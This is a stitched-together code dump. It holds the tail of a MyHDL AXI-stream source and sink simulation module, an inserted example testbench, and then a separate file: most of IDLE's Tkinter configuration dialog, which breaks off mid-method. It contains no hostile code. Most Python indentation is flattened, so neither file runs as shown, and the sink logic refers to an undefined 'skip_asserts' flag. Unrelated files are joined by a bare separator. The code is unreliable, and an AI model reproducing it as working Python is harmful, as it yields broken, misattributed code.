tvalid.next = tvalid_int and not pause
@instance
def logic():
frame = AXIStreamFrame()
data = []
keep = []
id = []
dest = []
user = []
B = 0
N = len(tdata)
M = len(tkeep)
WL = int((len(tdata)+M-1)/M)
if type(tdata) is list or type(tdata) is tuple:
# multiple tdata signals
B = len(tdata)
N = [len(b) for b in tdata]
M = 1
WL = [1]*B
while True:
yield clk.posedge, rst.posedge
if rst:
if B > 0:
for s in tdata:
s.next = 0
else:
tdata.next = 0
tkeep.next = 0
tid.next = 0
tdest.next = 0
tuser.next = False
tvalid_int.next = False
tlast.next = False
else:
if tready_int and tvalid:
if len(data) > 0:
if B > 0:
l = data.pop(0)
for i in range(B):
tdata[i].next = l[i]
else:
tdata.next = data.pop(0)
tkeep.next = keep.pop(0)
tid.next = id.pop(0)
tdest.next = dest.pop(0)
tuser.next = user.pop(0)
tvalid_int.next = True
tlast.next = len(data) == 0
else:
tvalid_int.next = False
tlast.next = False
if (tlast and tready_int and tvalid) or not tvalid_int:
if self.queue:
frame = self.queue.pop(0)
frame.B = B
frame.N = N
frame.M = M
frame.WL = WL
data, keep, id, dest, user = frame.build()
if name is not None:
print("[%s] Sending frame %s" % (name, repr(frame)))
if B > 0:
l = data.pop(0)
for i in range(B):
tdata[i].next = l[i]
else:
tdata.next = data.pop(0)
tkeep.next = keep.pop(0)
tid.next = id.pop(0)
tdest.next = dest.pop(0)
tuser.next = user.pop(0)
tvalid_int.next = True
tlast.next = len(data) == 0
return instances()
class AXIStreamSink(object):
def __init__(self):
self.has_logic = False
self.queue = []
self.read_queue = []
self.sync = Signal(intbv(0))
def recv(self):
if self.queue:
return self.queue.pop(0)
return None
def read(self, count=-1):
while self.queue:
self.read_queue.extend(self.queue.pop(0).data)
if count < 0:
count = len(self.read_queue)
data = self.read_queue[:count]
del self.read_queue[:count]
return data
def count(self):
return len(self.queue)
def empty(self):
return not self.queue
def wait(self, timeout=0):
if self.queue:
return
if timeout:
yield self.sync, delay(timeout)
else:
yield self.sync
def create_logic(self,
clk,
rst,
tdata=None,
tkeep=Signal(bool(True)),
tvalid=Signal(bool(False)),
tready=Signal(bool(True)),
tlast=Signal(bool(True)),
tid=Signal(intbv(0)),
tdest=Signal(intbv(0)),
tuser=Signal(intbv(0)),
pause=0,
name=None
):
assert not self.has_logic
self.has_logic = True
tready_int = Signal(bool(False))
tvalid_int = Signal(bool(False))
@always_comb
def pause_logic():
tready.next = tready_int and not pause
tvalid_int.next = tvalid and not pause
@instance
def logic():
frame = AXIStreamFrame()
data = []
keep = []
id = []
dest = []
user = []
B = 0
N = len(tdata)
M = len(tkeep)
WL = int((len(tdata)+M-1)/M)
first = True
if type(tdata) is list or type(tdata) is tuple:
# multiple tdata signals
B = len(tdata)
N = [len(b) for b in tdata]
M = 1
WL = [1]*B
while True:
yield clk.posedge, rst.posedge
if rst:
tready_int.next = False
frame = AXIStreamFrame()
data = []
keep = []
id = []
dest = []
user = []
first = True
else:
tready_int.next = True
if tvalid_int:
if not skip_asserts:
# zero tkeep not allowed
assert int(tkeep) != 0
# tkeep must be contiguous
# i.e. 0b00011110 allowed, but 0b00011010 not allowed
b = int(tkeep)
while b & 1 == 0:
b = b >> 1
while b & 1 == 1:
b = b >> 1
assert b == 0
# tkeep must not have gaps across cycles
if not first:
# not first cycle; lowest bit must be set
assert int(tkeep) & 1
if not tlast:
# not last cycle; highest bit must be set
assert int(tkeep) & (1 << len(tkeep)-1)
if B > 0:
l = []
for i in range(B):
l.append(int(tdata[i]))
data.append(l)
else:
data.append(int(tdata))
keep.append(int(tkeep))
id.append(int(tid))
dest.append(int(tdest))
user.append(int(tuser))
first = False
if tlast:
frame.B = B
frame.N = N
frame.M = M
frame.WL = WL
frame.parse(data, keep, id, dest, user)
self.queue.append(frame)
self.sync.next = not self.sync
if name is not None:
print("[%s] Got frame %s" % (name, repr(frame)))
frame = AXIStreamFrame()
data = []
keep = []
id = []
dest = []
user = []
first = True
return instances()
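# --- Hedged testbench sketch (not part of the original module) ---
# Shows how AXIStreamSource and AXIStreamSink are typically wired back to
# back through shared AXI stream signals; loosely modeled on the test benches
# that accompany this library. Signal widths are arbitrary example values and
# the frame payload is a placeholder.
def _example_testbench():
    clk = Signal(bool(0))
    rst = Signal(bool(0))
    tdata = Signal(intbv(0)[64:])
    tkeep = Signal(intbv(0)[8:])
    tvalid = Signal(bool(False))
    tready = Signal(bool(False))
    tlast = Signal(bool(False))
    source = AXIStreamSource()
    sink = AXIStreamSink()
    source_logic = source.create_logic(clk, rst, tdata=tdata, tkeep=tkeep,
                                       tvalid=tvalid, tready=tready,
                                       tlast=tlast, name='source')
    sink_logic = sink.create_logic(clk, rst, tdata=tdata, tkeep=tkeep,
                                   tvalid=tvalid, tready=tready,
                                   tlast=tlast, name='sink')
    @always(delay(4))
    def clkgen():
        clk.next = not clk
    @instance
    def check():
        yield clk.posedge
        source.send(AXIStreamFrame(b'hello world'))
        while sink.empty():
            yield clk.posedge
        rx_frame = sink.recv()
        assert rx_frame.data == b'hello world'
        raise StopSimulation
    return instances()
# Run with: Simulation(_example_testbench()).run()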
|
|
"""IDLE Configuration Dialog: support user customization of IDLE by GUI
Customize font faces, sizes, and colorization attributes. Set indentation
defaults. Customize keybindings. Colorization and keybindings can be
saved as user defined sets. Select startup options including shell/editor
and default window size. Define additional help sources.
Note that tab width in IDLE is currently fixed at eight due to Tk issues.
Refer to comments in EditorWindow autoindent code for details.
"""
from Tkinter import *
import tkMessageBox, tkColorChooser, tkFont
import string
from idlelib.configHandler import idleConf
from idlelib.dynOptionMenuWidget import DynOptionMenu
from idlelib.tabbedpages import TabbedPageSet
from idlelib.keybindingDialog import GetKeysDialog
from idlelib.configSectionNameDialog import GetCfgSectionNameDialog
from idlelib.configHelpSourceEdit import GetHelpSourceDialog
from idlelib import macosxSupport
class ConfigDialog(Toplevel):
def __init__(self,parent,title):
Toplevel.__init__(self, parent)
self.wm_withdraw()
self.configure(borderwidth=5)
self.title('IDLE Preferences')
self.geometry("+%d+%d" % (parent.winfo_rootx()+20,
parent.winfo_rooty()+30))
        #Theme Elements. Each theme element key is its display name.
#The first value of the tuple is the sample area tag name.
#The second value is the display name list sort index.
self.themeElements={'Normal Text':('normal','00'),
'Python Keywords':('keyword','01'),
'Python Definitions':('definition','02'),
'Python Builtins':('builtin', '03'),
'Python Comments':('comment','04'),
'Python Strings':('string','05'),
'Selected Text':('hilite','06'),
'Found Text':('hit','07'),
'Cursor':('cursor','08'),
'Error Text':('error','09'),
'Shell Normal Text':('console','10'),
'Shell Stdout Text':('stdout','11'),
'Shell Stderr Text':('stderr','12'),
}
self.ResetChangedItems() #load initial values in changed items dict
self.CreateWidgets()
self.resizable(height=FALSE,width=FALSE)
self.transient(parent)
self.grab_set()
self.protocol("WM_DELETE_WINDOW", self.Cancel)
self.parent = parent
self.tabPages.focus_set()
#key bindings for this dialog
#self.bind('<Escape>',self.Cancel) #dismiss dialog, no save
#self.bind('<Alt-a>',self.Apply) #apply changes, save
#self.bind('<F1>',self.Help) #context help
self.LoadConfigs()
self.AttachVarCallbacks() #avoid callbacks during LoadConfigs
self.wm_deiconify()
self.wait_window()
def CreateWidgets(self):
self.tabPages = TabbedPageSet(self,
page_names=['Fonts/Tabs','Highlighting','Keys','General'])
frameActionButtons = Frame(self,pady=2)
#action buttons
if macosxSupport.runningAsOSXApp():
# Changing the default padding on OSX results in unreadable
# text in the buttons
paddingArgs={}
else:
paddingArgs={'padx':6, 'pady':3}
self.buttonHelp = Button(frameActionButtons,text='Help',
command=self.Help,takefocus=FALSE,
**paddingArgs)
self.buttonOk = Button(frameActionButtons,text='Ok',
command=self.Ok,takefocus=FALSE,
**paddingArgs)
self.buttonApply = Button(frameActionButtons,text='Apply',
command=self.Apply,takefocus=FALSE,
**paddingArgs)
self.buttonCancel = Button(frameActionButtons,text='Cancel',
command=self.Cancel,takefocus=FALSE,
**paddingArgs)
self.CreatePageFontTab()
self.CreatePageHighlight()
self.CreatePageKeys()
self.CreatePageGeneral()
self.buttonHelp.pack(side=RIGHT,padx=5)
self.buttonOk.pack(side=LEFT,padx=5)
self.buttonApply.pack(side=LEFT,padx=5)
self.buttonCancel.pack(side=LEFT,padx=5)
frameActionButtons.pack(side=BOTTOM)
Frame(self, height=2, borderwidth=0).pack(side=BOTTOM)
self.tabPages.pack(side=TOP,expand=TRUE,fill=BOTH)
def CreatePageFontTab(self):
#tkVars
self.fontSize=StringVar(self)
self.fontBold=BooleanVar(self)
self.fontName=StringVar(self)
self.spaceNum=IntVar(self)
self.editFont=tkFont.Font(self,('courier',10,'normal'))
##widget creation
#body frame
frame=self.tabPages.pages['Fonts/Tabs'].frame
#body section frames
frameFont=LabelFrame(frame,borderwidth=2,relief=GROOVE,
text=' Base Editor Font ')
frameIndent=LabelFrame(frame,borderwidth=2,relief=GROOVE,
text=' Indentation Width ')
#frameFont
frameFontName=Frame(frameFont)
frameFontParam=Frame(frameFont)
labelFontNameTitle=Label(frameFontName,justify=LEFT,
text='Font Face :')
self.listFontName=Listbox(frameFontName,height=5,takefocus=FALSE,
exportselection=FALSE)
self.listFontName.bind('<ButtonRelease-1>',self.OnListFontButtonRelease)
scrollFont=Scrollbar(frameFontName)
scrollFont.config(command=self.listFontName.yview)
self.listFontName.config(yscrollcommand=scrollFont.set)
labelFontSizeTitle=Label(frameFontParam,text='Size :')
self.optMenuFontSize=DynOptionMenu(frameFontParam,self.fontSize,None,
command=self.SetFontSample)
checkFontBold=Checkbutton(frameFontParam,variable=self.fontBold,
onvalue=1,offvalue=0,text='Bold',command=self.SetFontSample)
frameFontSample=Frame(frameFont,relief=SOLID,borderwidth=1)
self.labelFontSample=Label(frameFontSample,
text='AaBbCcDdEe\nFfGgHhIiJjK\n1234567890\n#:+=(){}[]',
justify=LEFT,font=self.editFont)
#frameIndent
frameIndentSize=Frame(frameIndent)
labelSpaceNumTitle=Label(frameIndentSize, justify=LEFT,
text='Python Standard: 4 Spaces!')
self.scaleSpaceNum=Scale(frameIndentSize, variable=self.spaceNum,
orient='horizontal',
tickinterval=2, from_=2, to=16)
#widget packing
#body
frameFont.pack(side=LEFT,padx=5,pady=5,expand=TRUE,fill=BOTH)
frameIndent.pack(side=LEFT,padx=5,pady=5,fill=Y)
#frameFont
frameFontName.pack(side=TOP,padx=5,pady=5,fill=X)
frameFontParam.pack(side=TOP,padx=5,pady=5,fill=X)
labelFontNameTitle.pack(side=TOP,anchor=W)
self.listFontName.pack(side=LEFT,expand=TRUE,fill=X)
scrollFont.pack(side=LEFT,fill=Y)
labelFontSizeTitle.pack(side=LEFT,anchor=W)
self.optMenuFontSize.pack(side=LEFT,anchor=W)
checkFontBold.pack(side=LEFT,anchor=W,padx=20)
frameFontSample.pack(side=TOP,padx=5,pady=5,expand=TRUE,fill=BOTH)
self.labelFontSample.pack(expand=TRUE,fill=BOTH)
#frameIndent
frameIndentSize.pack(side=TOP,fill=X)
labelSpaceNumTitle.pack(side=TOP,anchor=W,padx=5)
self.scaleSpaceNum.pack(side=TOP,padx=5,fill=X)
return frame
def CreatePageHighlight(self):
self.builtinTheme=StringVar(self)
self.customTheme=StringVar(self)
self.fgHilite=BooleanVar(self)
self.colour=StringVar(self)
self.fontName=StringVar(self)
self.themeIsBuiltin=BooleanVar(self)
self.highlightTarget=StringVar(self)
##widget creation
#body frame
frame=self.tabPages.pages['Highlighting'].frame
#body section frames
frameCustom=LabelFrame(frame,borderwidth=2,relief=GROOVE,
text=' Custom Highlighting ')
        frameTheme=LabelFrame(frame,borderwidth=2,relief=GROOVE,
                              text=' Highlighting Theme ')
#frameCustom
self.textHighlightSample=Text(frameCustom,relief=SOLID,borderwidth=1,
font=('courier',12,''),cursor='hand2',width=21,height=11,
takefocus=FALSE,highlightthickness=0,wrap=NONE)
text=self.textHighlightSample
text.bind('<Double-Button-1>',lambda e: 'break')
text.bind('<B1-Motion>',lambda e: 'break')
textAndTags=(('#you can click here','comment'),('\n','normal'),
('#to choose items','comment'),('\n','normal'),('def','keyword'),
(' ','normal'),('func','definition'),('(param):','normal'),
('\n ','normal'),('"""string"""','string'),('\n var0 = ','normal'),
("'string'",'string'),('\n var1 = ','normal'),("'selected'",'hilite'),
('\n var2 = ','normal'),("'found'",'hit'),
('\n var3 = ','normal'),('list', 'builtin'), ('(','normal'),
('None', 'builtin'),(')\n\n','normal'),
(' error ','error'),(' ','normal'),('cursor |','cursor'),
('\n ','normal'),('shell','console'),(' ','normal'),('stdout','stdout'),
(' ','normal'),('stderr','stderr'),('\n','normal'))
for txTa in textAndTags:
text.insert(END,txTa[0],txTa[1])
for element in self.themeElements.keys():
text.tag_bind(self.themeElements[element][0],'<ButtonPress-1>',
lambda event,elem=element: event.widget.winfo_toplevel()
.highlightTarget.set(elem))
text.config(state=DISABLED)
self.frameColourSet=Frame(frameCustom,relief=SOLID,borderwidth=1)
frameFgBg=Frame(frameCustom)
buttonSetColour=Button(self.frameColourSet,text='Choose Colour for :',
command=self.GetColour,highlightthickness=0)
self.optMenuHighlightTarget=DynOptionMenu(self.frameColourSet,
self.highlightTarget,None,highlightthickness=0)#,command=self.SetHighlightTargetBinding
self.radioFg=Radiobutton(frameFgBg,variable=self.fgHilite,
value=1,text='Foreground',command=self.SetColourSampleBinding)
self.radioBg=Radiobutton(frameFgBg,variable=self.fgHilite,
value=0,text='Background',command=self.SetColourSampleBinding)
self.fgHilite.set(1)
buttonSaveCustomTheme=Button(frameCustom,
text='Save as New Custom Theme',command=self.SaveAsNewTheme)
#frameTheme
labelTypeTitle=Label(frameTheme,text='Select : ')
self.radioThemeBuiltin=Radiobutton(frameTheme,variable=self.themeIsBuiltin,
value=1,command=self.SetThemeType,text='a Built-in Theme')
self.radioThemeCustom=Radiobutton(frameTheme,variable=self.themeIsBuiltin,
value=0,command=self.SetThemeType,text='a Custom Theme')
self.optMenuThemeBuiltin=DynOptionMenu(frameTheme,
self.builtinTheme,None,command=None)
self.optMenuThemeCustom=DynOptionMenu(frameTheme,
self.customTheme,None,command=None)
self.buttonDeleteCustomTheme=Button(frameTheme,text='Delete Custom Theme',
command=self.DeleteCustomTheme)
##widget packing
#body
frameCustom.pack(side=LEFT,padx=5,pady=5,expand=TRUE,fill=BOTH)
frameTheme.pack(side=LEFT,padx=5,pady=5,fill=Y)
#frameCustom
self.frameColourSet.pack(side=TOP,padx=5,pady=5,expand=TRUE,fill=X)
frameFgBg.pack(side=TOP,padx=5,pady=0)
self.textHighlightSample.pack(side=TOP,padx=5,pady=5,expand=TRUE,
fill=BOTH)
buttonSetColour.pack(side=TOP,expand=TRUE,fill=X,padx=8,pady=4)
self.optMenuHighlightTarget.pack(side=TOP,expand=TRUE,fill=X,padx=8,pady=3)
self.radioFg.pack(side=LEFT,anchor=E)
self.radioBg.pack(side=RIGHT,anchor=W)
buttonSaveCustomTheme.pack(side=BOTTOM,fill=X,padx=5,pady=5)
#frameTheme
labelTypeTitle.pack(side=TOP,anchor=W,padx=5,pady=5)
self.radioThemeBuiltin.pack(side=TOP,anchor=W,padx=5)
self.radioThemeCustom.pack(side=TOP,anchor=W,padx=5,pady=2)
self.optMenuThemeBuiltin.pack(side=TOP,fill=X,padx=5,pady=5)
self.optMenuThemeCustom.pack(side=TOP,fill=X,anchor=W,padx=5,pady=5)
self.buttonDeleteCustomTheme.pack(side=TOP,fill=X,padx=5,pady=5)
return frame
def CreatePageKeys(self):
#tkVars
self.bindingTarget=StringVar(self)
self.builtinKeys=StringVar(self)
self.customKeys=StringVar(self)
self.keysAreBuiltin=BooleanVar(self)
self.keyBinding=StringVar(self)
##widget creation
#body frame
frame=self.tabPages.pages['Keys'].frame
#body section frames
frameCustom=LabelFrame(frame,borderwidth=2,relief=GROOVE,
text=' Custom Key Bindings ')
frameKeySets=LabelFrame(frame,borderwidth=2,relief=GROOVE,
text=' Key Set ')
#frameCustom
frameTarget=Frame(frameCustom)
labelTargetTitle=Label(frameTarget,text='Action - Key(s)')
scrollTargetY=Scrollbar(frameTarget)
scrollTargetX=Scrollbar(frameTarget,orient=HORIZONTAL)
self.listBindings=Listbox(frameTarget,takefocus=FALSE,
exportselection=FALSE)
self.listBindings.bind('<ButtonRelease-1>',self.KeyBindingSelected)
scrollTargetY.config(command=self.listBindings.yview)
scrollTargetX.config(command=self.listBindings.xview)
self.listBindings.config(yscrollcommand=scrollTargetY.set)
self.listBindings.config(xscrollcommand=scrollTargetX.set)
self.buttonNewKeys=Button(frameCustom,text='Get New Keys for Selection',
command=self.GetNewKeys,state=DISABLED)
#frameKeySets
frames = [Frame(frameKeySets, padx=2, pady=2, borderwidth=0)
for i in range(2)]
self.radioKeysBuiltin=Radiobutton(frames[0],variable=self.keysAreBuiltin,
value=1,command=self.SetKeysType,text='Use a Built-in Key Set')
self.radioKeysCustom=Radiobutton(frames[0],variable=self.keysAreBuiltin,
value=0,command=self.SetKeysType,text='Use a Custom Key Set')
self.optMenuKeysBuiltin=DynOptionMenu(frames[0],
self.builtinKeys,None,command=None)
self.optMenuKeysCustom=DynOptionMenu(frames[0],
self.customKeys,None,command=None)
self.buttonDeleteCustomKeys=Button(frames[1],text='Delete Custom Key Set',
command=self.DeleteCustomKeys)
buttonSaveCustomKeys=Button(frames[1],
text='Save as New Custom Key Set',command=self.SaveAsNewKeySet)
##widget packing
#body
frameCustom.pack(side=BOTTOM,padx=5,pady=5,expand=TRUE,fill=BOTH)
frameKeySets.pack(side=BOTTOM,padx=5,pady=5,fill=BOTH)
#frameCustom
self.buttonNewKeys.pack(side=BOTTOM,fill=X,padx=5,pady=5)
frameTarget.pack(side=LEFT,padx=5,pady=5,expand=TRUE,fill=BOTH)
#frame target
frameTarget.columnconfigure(0,weight=1)
frameTarget.rowconfigure(1,weight=1)
labelTargetTitle.grid(row=0,column=0,columnspan=2,sticky=W)
self.listBindings.grid(row=1,column=0,sticky=NSEW)
scrollTargetY.grid(row=1,column=1,sticky=NS)
scrollTargetX.grid(row=2,column=0,sticky=EW)
#frameKeySets
self.radioKeysBuiltin.grid(row=0, column=0, sticky=W+NS)
self.radioKeysCustom.grid(row=1, column=0, sticky=W+NS)
self.optMenuKeysBuiltin.grid(row=0, column=1, sticky=NSEW)
self.optMenuKeysCustom.grid(row=1, column=1, sticky=NSEW)
self.buttonDeleteCustomKeys.pack(side=LEFT,fill=X,expand=True,padx=2)
buttonSaveCustomKeys.pack(side=LEFT,fill=X,expand=True,padx=2)
frames[0].pack(side=TOP, fill=BOTH, expand=True)
frames[1].pack(side=TOP, fill=X, expand=True, pady=2)
return frame
def CreatePageGeneral(self):
#tkVars
self.winWidth=StringVar(self)
self.winHeight=StringVar(self)
self.paraWidth=StringVar(self)
self.startupEdit=IntVar(self)
self.autoSave=IntVar(self)
self.encoding=StringVar(self)
self.userHelpBrowser=BooleanVar(self)
self.helpBrowser=StringVar(self)
#widget creation
#body
frame=self.tabPages.pages['General'].frame
#body section frames
frameRun=LabelFrame(frame,borderwidth=2,relief=GROOVE,
text=' Startup Preferences ')
frameSave=LabelFrame(frame,borderwidth=2,relief=GROOVE,
text=' Autosave Preferences ')
frameWinSize=Frame(frame,borderwidth=2,relief=GROOVE)
frameParaSize=Frame(frame,borderwidth=2,relief=GROOVE)
frameEncoding=Frame(frame,borderwidth=2,relief=GROOVE)
frameHelp=LabelFrame(frame,borderwidth=2,relief=GROOVE,
text=' Additional Help Sources ')
#frameRun
labelRunChoiceTitle=Label(frameRun,text='At Startup')
radioStartupEdit=Radiobutton(frameRun,variable=self.startupEdit,
value=1,command=self.SetKeysType,text="Open Edit Window")
radioStartupShell=Radiobutton(frameRun,variable=self.startupEdit,
value=0,command=self.SetKeysType,text='Open Shell Window')
#frameSave
labelRunSaveTitle=Label(frameSave,text='At Start of Run (F5) ')
radioSaveAsk=Radiobutton(frameSave,variable=self.autoSave,
value=0,command=self.SetKeysType,text="Prompt to Save")
radioSaveAuto=Radiobutton(frameSave,variable=self.autoSave,
value=1,command=self.SetKeysType,text='No Prompt')
#frameWinSize
labelWinSizeTitle=Label(frameWinSize,text='Initial Window Size'+
' (in characters)')
labelWinWidthTitle=Label(frameWinSize,text='Width')
entryWinWidth=Entry(frameWinSize,textvariable=self.winWidth,
width=3)
labelWinHeightTitle=Label(frameWinSize,text='Height')
entryWinHeight=Entry(frameWinSize,textvariable=self.winHeight,
width=3)
#paragraphFormatWidth
labelParaWidthTitle=Label(frameParaSize,text='Paragraph reformat'+
' width (in characters)')
entryParaWidth=Entry(frameParaSize,textvariable=self.paraWidth,
width=3)
#frameEncoding
labelEncodingTitle=Label(frameEncoding,text="Default Source Encoding")
radioEncLocale=Radiobutton(frameEncoding,variable=self.encoding,
value="locale",text="Locale-defined")
radioEncUTF8=Radiobutton(frameEncoding,variable=self.encoding,
value="utf-8",text="UTF-8")
radioEncNone=Radiobutton(frameEncoding,variable=self.encoding,
value="none",text="None")
#frameHelp
frameHelpList=Frame(frameHelp)
frameHelpListButtons=Frame(frameHelpList)
scrollHelpList=Scrollbar(frameHelpList)
self.listHelp=Listbox(frameHelpList,height=5,takefocus=FALSE,
exportselection=FALSE)
scrollHelpList.config(command=self.listHelp.yview)
self.listHelp.config(yscrollcommand=scrollHelpList.set)
self.listHelp.bind('<ButtonRelease-1>',self.HelpSourceSelected)
self.buttonHelpListEdit=Button(frameHelpListButtons,text='Edit',
state=DISABLED,width=8,command=self.HelpListItemEdit)
self.buttonHelpListAdd=Button(frameHelpListButtons,text='Add',
width=8,command=self.HelpListItemAdd)
self.buttonHelpListRemove=Button(frameHelpListButtons,text='Remove',
state=DISABLED,width=8,command=self.HelpListItemRemove)
#widget packing
#body
frameRun.pack(side=TOP,padx=5,pady=5,fill=X)
frameSave.pack(side=TOP,padx=5,pady=5,fill=X)
frameWinSize.pack(side=TOP,padx=5,pady=5,fill=X)
frameParaSize.pack(side=TOP,padx=5,pady=5,fill=X)
frameEncoding.pack(side=TOP,padx=5,pady=5,fill=X)
frameHelp.pack(side=TOP,padx=5,pady=5,expand=TRUE,fill=BOTH)
#frameRun
labelRunChoiceTitle.pack(side=LEFT,anchor=W,padx=5,pady=5)
radioStartupShell.pack(side=RIGHT,anchor=W,padx=5,pady=5)
radioStartupEdit.pack(side=RIGHT,anchor=W,padx=5,pady=5)
#frameSave
labelRunSaveTitle.pack(side=LEFT,anchor=W,padx=5,pady=5)
radioSaveAuto.pack(side=RIGHT,anchor=W,padx=5,pady=5)
radioSaveAsk.pack(side=RIGHT,anchor=W,padx=5,pady=5)
#frameWinSize
labelWinSizeTitle.pack(side=LEFT,anchor=W,padx=5,pady=5)
entryWinHeight.pack(side=RIGHT,anchor=E,padx=10,pady=5)
labelWinHeightTitle.pack(side=RIGHT,anchor=E,pady=5)
entryWinWidth.pack(side=RIGHT,anchor=E,padx=10,pady=5)
labelWinWidthTitle.pack(side=RIGHT,anchor=E,pady=5)
#paragraphFormatWidth
labelParaWidthTitle.pack(side=LEFT,anchor=W,padx=5,pady=5)
entryParaWidth.pack(side=RIGHT,anchor=E,padx=10,pady=5)
#frameEncoding
labelEncodingTitle.pack(side=LEFT,anchor=W,padx=5,pady=5)
radioEncNone.pack(side=RIGHT,anchor=E,pady=5)
radioEncUTF8.pack(side=RIGHT,anchor=E,pady=5)
radioEncLocale.pack(side=RIGHT,anchor=E,pady=5)
#frameHelp
frameHelpListButtons.pack(side=RIGHT,padx=5,pady=5,fill=Y)
frameHelpList.pack(side=TOP,padx=5,pady=5,expand=TRUE,fill=BOTH)
scrollHelpList.pack(side=RIGHT,anchor=W,fill=Y)
self.listHelp.pack(side=LEFT,anchor=E,expand=TRUE,fill=BOTH)
self.buttonHelpListEdit.pack(side=TOP,anchor=W,pady=5)
self.buttonHelpListAdd.pack(side=TOP,anchor=W)
self.buttonHelpListRemove.pack(side=TOP,anchor=W,pady=5)
return frame
def AttachVarCallbacks(self):
self.fontSize.trace_variable('w',self.VarChanged_fontSize)
self.fontName.trace_variable('w',self.VarChanged_fontName)
self.fontBold.trace_variable('w',self.VarChanged_fontBold)
self.spaceNum.trace_variable('w',self.VarChanged_spaceNum)
self.colour.trace_variable('w',self.VarChanged_colour)
self.builtinTheme.trace_variable('w',self.VarChanged_builtinTheme)
self.customTheme.trace_variable('w',self.VarChanged_customTheme)
self.themeIsBuiltin.trace_variable('w',self.VarChanged_themeIsBuiltin)
self.highlightTarget.trace_variable('w',self.VarChanged_highlightTarget)
self.keyBinding.trace_variable('w',self.VarChanged_keyBinding)
self.builtinKeys.trace_variable('w',self.VarChanged_builtinKeys)
self.customKeys.trace_variable('w',self.VarChanged_customKeys)
self.keysAreBuiltin.trace_variable('w',self.VarChanged_keysAreBuiltin)
self.winWidth.trace_variable('w',self.VarChanged_winWidth)
self.winHeight.trace_variable('w',self.VarChanged_winHeight)
self.paraWidth.trace_variable('w',self.VarChanged_paraWidth)
self.startupEdit.trace_variable('w',self.VarChanged_startupEdit)
self.autoSave.trace_variable('w',self.VarChanged_autoSave)
self.encoding.trace_variable('w',self.VarChanged_encoding)
def VarChanged_fontSize(self,*params):
value=self.fontSize.get()
self.AddChangedItem('main','EditorWindow','font-size',value)
def VarChanged_fontName(self,*params):
value=self.fontName.get()
self.AddChangedItem('main','EditorWindow','font',value)
def VarChanged_fontBold(self,*params):
value=self.fontBold.get()
self.AddChangedItem('main','EditorWindow','font-bold',value)
def VarChanged_spaceNum(self,*params):
value=self.spaceNum.get()
self.AddChangedItem('main','Indent','num-spaces',value)
def VarChanged_colour(self,*params):
self.OnNewColourSet()
def VarChanged_builtinTheme(self,*params):
value=self.builtinTheme.get()
self.AddChangedItem('main','Theme','name',value)
self.PaintThemeSample()
def VarChanged_customTheme(self,*params):
value=self.customTheme.get()
if value != '- no custom themes -':
self.AddChangedItem('main','Theme','name',value)
self.PaintThemeSample()
def VarChanged_themeIsBuiltin(self,*params):
value=self.themeIsBuiltin.get()
self.AddChangedItem('main','Theme','default',value)
if value:
self.VarChanged_builtinTheme()
else:
self.VarChanged_customTheme()
def VarChanged_highlightTarget(self,*params):
self.SetHighlightTarget()
def VarChanged_keyBinding(self,*params):
value=self.keyBinding.get()
keySet=self.customKeys.get()
event=self.listBindings.get(ANCHOR).split()[0]
if idleConf.IsCoreBinding(event):
#this is a core keybinding
self.AddChangedItem('keys',keySet,event,value)
else: #this is an extension key binding
extName=idleConf.GetExtnNameForEvent(event)
extKeybindSection=extName+'_cfgBindings'
self.AddChangedItem('extensions',extKeybindSection,event,value)
def VarChanged_builtinKeys(self,*params):
value=self.builtinKeys.get()
self.AddChangedItem('main','Keys','name',value)
self.LoadKeysList(value)
def VarChanged_customKeys(self,*params):
value=self.customKeys.get()
if value != '- no custom keys -':
self.AddChangedItem('main','Keys','name',value)
self.LoadKeysList(value)
def VarChanged_keysAreBuiltin(self,*params):
value=self.keysAreBuiltin.get()
self.AddChangedItem('main','Keys','default',value)
if value:
self.VarChanged_builtinKeys()
else:
self.VarChanged_customKeys()
def VarChanged_winWidth(self,*params):
value=self.winWidth.get()
self.AddChangedItem('main','EditorWindow','width',value)
def VarChanged_winHeight(self,*params):
value=self.winHeight.get()
self.AddChangedItem('main','EditorWindow','height',value)
def VarChanged_paraWidth(self,*params):
value=self.paraWidth.get()
self.AddChangedItem('main','FormatParagraph','paragraph',value)
def VarChanged_startupEdit(self,*params):
value=self.startupEdit.get()
self.AddChangedItem('main','General','editor-on-startup',value)
def VarChanged_autoSave(self,*params):
value=self.autoSave.get()
self.AddChangedItem('main','General','autosave',value)
def VarChanged_encoding(self,*params):
value=self.encoding.get()
self.AddChangedItem('main','EditorWindow','encoding',value)
def ResetChangedItems(self):
#When any config item is changed in this dialog, an entry
#should be made in the relevant section (config type) of this
#dictionary. The key should be the config file section name and the
#value a dictionary, whose key:value pairs are item=value pairs for
#that config file section.
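        #For example, choosing a new editor font on the Fonts/Tabs page is
        #recorded (via VarChanged_fontName below) as:
        #    self.changedItems['main']['EditorWindow']['font'] = '<font name>'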
self.changedItems={'main':{},'highlight':{},'keys':{},'extensions':{}}
def AddChangedItem(self,type,section,item,value):
value=str(value) #make sure we use a string
if section not in self.changedItems[type]:
self.changedItems[type][section]={}
self.changedItems[type][section][item]=value
def GetDefaultItems(self):
dItems={'main':{},'highlight':{},'keys':{},'extensions':{}}
for configType in dItems.keys():
sections=idleConf.GetSectionList('default',configType)
for section in sections:
dItems[configType][section]={}
options=idleConf.defaultCfg[configType].GetOptionList(section)
for option in options:
dItems[configType][section][option]=(
idleConf.defaultCfg[configType].Get(section,option))
return dItems
def SetThemeType(self):
if self.themeIsBuiltin.get():
self.optMenuThemeBuiltin.config(state=NORMAL)
self.optMenuThemeCustom.config(state=DISABLED)
self.buttonDeleteCustomTheme.config(state=DISABLED)
else:
self.optMenuThemeBuiltin.config(state=DISABLED)
self.radioThemeCustom.config(state=NORMAL)
self.optMenuThemeCustom.config(state=NORMAL)
self.buttonDeleteCustomTheme.config(state=NORMAL)
def SetKeysType(self):
if self.keysAreBuiltin.get():
self.optMenuKeysBuiltin.config(state=NORMAL)
self.optMenuKeysCustom.config(state=DISABLED)
self.buttonDeleteCustomKeys.config(state=DISABLED)
else:
self.optMenuKeysBuiltin.config(state=DISABLED)
self.radioKeysCustom.config(state=NORMAL)
self.optMenuKeysCustom.config(state=NORMAL)
self.buttonDeleteCustomKeys.config(state=NORMAL)
def GetNewKeys(self):
listIndex=self.listBindings.index(ANCHOR)
binding=self.listBindings.get(listIndex)
bindName=binding.split()[0] #first part, up to first space
if self.keysAreBuiltin.get():
currentKeySetName=self.builtinKeys.get()
else:
currentKeySetName=self.customKeys.get()
currentBindings=idleConf.GetCurrentKeySet()
if currentKeySetName in self.changedItems['keys'].keys(): #unsaved changes
keySetChanges=self.changedItems['keys'][currentKeySetName]
